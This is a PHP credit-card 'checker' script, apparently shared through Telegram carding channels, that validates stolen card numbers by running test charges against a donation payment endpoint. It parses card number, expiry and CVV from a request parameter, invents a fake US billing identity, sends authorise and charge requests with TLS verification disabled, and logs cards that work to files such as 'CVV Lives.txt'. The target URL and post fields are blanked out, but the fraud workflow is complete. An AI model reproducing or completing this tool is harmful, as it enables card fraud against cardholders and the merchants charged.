<?php
/// Link of the site:[......]/////
/// Made by 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】
/// Join @ZeltraxRockz & @ZeltraxChat for more...
/// This 2 req Proxyless RAW API Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁 ™】
error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('America/Buenos_Aires');
function multiexplode($delimiters, $string){
$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;}
$lista = $_GET['lista'];
$cc = multiexplode(array(":", "|", ""), $lista)[0];
$mon = multiexplode(array(":", "|", ""), $lista)[1];
$year = multiexplode(array(":", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "|", ""), $lista)[3];
if(strlen($year) == 2){
$year = substr($year, -2);}
else{
$year = substr($year, 2);}
function GetStr($string, $start, $end){
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];}
function saveCCN($cc) { 
$file = dirname(FILE) . "/CCN Lives.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveLive($cc) { 
$file = dirname(FILE) . "/Live Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveCVV($cc) { 
$file = dirname(FILE) . "/CVV Lives.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveStolenLives($cc) { 
$file = dirname(FILE) . "/Stolen Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function savePickupLives($cc) { 
$file = dirname(FILE) . "/Pickup Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveLostLives($cc) { 
$file = dirname(FILE) . "/Lost Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveZipLives($cc) { 
$file = dirname(FILE) . "/Incorrect Zip Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp); }
function saveInsufficientLives($cc) { 
$file = dirname(FILE) . "/Insufficient Fund Cards.txt";
$fp = fopen($file, "a+"); 
fwrite($fp, $cc . PHP_EOL); 
fclose($fp);}
/////////////////////////////////////BIN LOOKUP START////////////////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);
$bank = getStr($fim, '"bank":{"name":"', '"');
$name = getStr($fim, '"name":"', '"');
$brand = getStr($fim, '"brand":"', '"');
$country = getStr($fim, '"country":{"name":"', '"');
$scheme = getStr($fim, '"scheme":"', '"');
$currency = getStr($fim, '"currency":"', '"');
$emoji = getStr($fim, '"emoji":"', '"');
$type = getStr($fim, '"type":"', '"');
if(strpos($fim, '"type":"credit"') !== false) {
$bin = 'Credit';
}else{
$bin = 'Debit';}
/////////////////////////////////////BIN LOOKUP END////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------------------------------------------//
$first = str_shuffle("ZELTRAX");
$last = str_shuffle("ROCKZ");
$first1 = str_shuffle("zeltrax85246");
$email = "".$first1."%40gmail.com";
$address = "".rand(0000,9999)."+Main+Street";
$phone = rand(0000000000,9999999999);
$country = "US";
$st = array("AL","NY","CA","FL","WA");
$st1 = array_rand($st);
$state = $st[$st1];
if ($state == "NY"){
$zip = "10080";
$city = "New+York";}
elseif ($state == "WA"){
$zip = "98001";
$city = "Auburn";}
elseif ($state == "AL"){
$zip = "35005";
$city = "Adamsville";}
elseif ($state == "FL"){
$zip = "32003";
$city = "Orange+Park";}
else{
$zip = "90201";
$city = "Bell";};
//----------------------------------------------------------------------------------------------------------------------//
////////////////////////////////////===[For Authorizing Cards]////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, '..........');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(  
'authority: ...........',
'accept: ..............',
'accept-language: .....',
'content-type: ........',
'origin: ..............',
'referer: .............',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-site'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
//========================================================================================================================//
//========================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, '............');
//========================================================================================================================//
//========================================================================================================================//
$result = curl_exec($ch);
$token = trim(strip_tags(getStr($result,'"id": "','"')));
////////////////////////////===============[For Charging Cards]=============////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, '..........');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'authority: ...........',
'accept: ..............',
'accept-language: .....',
'content-type: ........',
'origin: ..............',
'referer: .............',
'sec-fetch-dest: empty',
'sec-fetch-mode: cors',
'sec-fetch-site: same-origin'));
//========================================================================================================================//
//========================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, '...Remember to use $token in 2nd req postfield (means in this postfield only)...');
//========================================================================================================================//
//========================================================================================================================//
$result = curl_exec($ch);
//////////////////////////////////==============[Card Response Start]================///////////////////////////////////////
if(strpos($result, '/donations/thank_you?donation_number=','')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, '"cvc_check":"pass"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = CVC Check Pass </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You For Donation.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"status":"succeeded"')){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card zip code is incorrect.')) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card zip code is incorrect </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_zip")) {saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect Zip </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Your payment has already been processed")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
  echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your payment has already been processed </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,"The zip code you supplied failed validation.")){saveZipLives ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = The zip code you supplied failed validation </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "Success")){saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Success </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result, "succeeded.")) {saveCVV ("Live CVV -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
elseif (strpos($result,'"type":"one-time"')){saveCVV ("Live Card -> $cc|$mon|$year|$cvv | Checker Made By 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】");
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = One Time </span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = 𝒁𝒆𝒍𝒕彡𝑨𝒅𝒂𝒓𝒔𝒉𝒀𝑻 【★🆉🆁™】</span></br><span class="badge badge-yellow">Telegram Username = @ZeltraxRockzzz</span></br><span class="badge badge-yellow">Channel Link = @ZeltraxRockz</span></br><span class="badge badge-yellow">Group link = @ZeltraxChat</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/TechieGamerz</span></br></br><span class="badge badge-red">====================================================================================</span></br></br>';
}
